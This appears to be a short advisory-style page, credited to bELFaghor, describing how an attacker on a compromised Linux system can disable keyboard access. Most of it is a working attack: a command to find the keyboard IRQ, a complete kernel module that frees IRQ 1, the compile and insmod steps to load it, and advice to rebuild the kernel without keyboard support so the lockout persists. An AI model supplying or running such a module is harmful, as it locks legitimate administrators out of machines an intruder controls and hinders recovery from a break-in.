|
|
|
|
| |
| After a system has been compromised, attackers sometimes create a new loadable module on the compromised system that can effectively disable all access to the machine. |
| |
Credit:
The information has been provided by bELFaghor.
|
| |
Reconstruction:
In order to disable access to the machine via the network, the attacker just has to disable the network services; this will not be covered in this article.
In order to disable access to the machine via the console/keyboard, you first need to find out which IRQ is assigned the keyboard. Executing the following commands can accomplish this:
# cat /proc/interrupts
0: 397526 timer
1: 8129 keyboard
2: 0 cascade
4: 772 + serial
Then compiling and loading the following module will complete the task of disabling keyboard access (NOTE: In the case that the keyboard IRQ is different from one, see above, you need to change it in the below provided code):
# cat > ivoluan.c << STOP
#define __KERNEL__
#define MODULE
#include <linux/kernel.h>
#include <linux/module.h>
#include <unistd.h>
int init_module(void) {
free_irq(1, NULL);
}
void cleanup_module(void) {
printk("fuck the world i will deny you\n");
}
STOP
# gcc -c ivoluan.c
# insmod ivoluan.o
After the module has been successfully uploaded, no keyboard keystrokes will ever reach the kernel, thus effectively disabling access from the keyboard to the operating system.
NOTE: This is only a temporary solution, since if the administrator reboots the machine the module will not load. To stop the keyboard access completely, you will need to recompile the kernel without keyboard support.
|
|
|
|
|
